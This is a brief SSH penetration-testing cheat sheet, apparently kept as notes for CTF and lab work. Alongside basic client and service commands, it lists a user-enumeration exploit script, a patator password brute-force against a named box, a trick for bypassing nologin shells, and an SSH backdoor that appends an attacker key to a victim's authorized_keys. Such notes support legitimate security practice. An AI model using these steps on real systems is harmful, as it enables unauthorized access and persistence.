Port 22 - SSH


ssh root@                 # password
ssh -i root_key root@     # public/privatekey

# troubleshooting - v: verbose
ssh -v

# bypass /usr/bin/nologin or /usr/bin/false
ssh -v noraj@ /bin/bash

# Force auth method
ssh -v -o PreferredAuthentications=password

# Disable Strick Host Key check
ssh -v -o StrictHostKeychecking=no -i id_rsa <user>@<ip>    

# When attempting to SSH, the SSH client displays "Unable to negotiate with <IP address> port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1"
ssh j0hn@ -p 22 -oKexAlgorithms=+diffie-hellman-group1-sha1

SSH Audit

# When you need to debug and understand what is going on SSH connection wit hconfiguration, run the following command. This is bit old. 


SSH Keys

id_rsa          # private key
id_rsa.pub      # public key
Authorized_key  # a list of public keys stored in server

User Enumeration

python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip

Brute-foce SSH password

patator ssh_login host=sunday.htb port=22 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/probable-v2-top1575.txt persistent=0

SSH Backdoor

# Attacker
ssh-keygen -f <FILENAME>
chmod 600 <FILENAME>
cat <FILENAME>.pub -> copy

# Victim
echo <FILENAME>.pub >> <PATH>/.ssh/authorized_keys

# Connect
ssh -i <FILENAME> <USER>@<IP>

Services to stop and start

# Enable the service
sudo systemctl enable ssh 

# Start and restart the service
sudo service ssh status
sudo service ssh restart

# Another way to start the service
sudo systemctl start ssh

# Find a SSH process
sudo ss -antlp | grep sshd

Last updated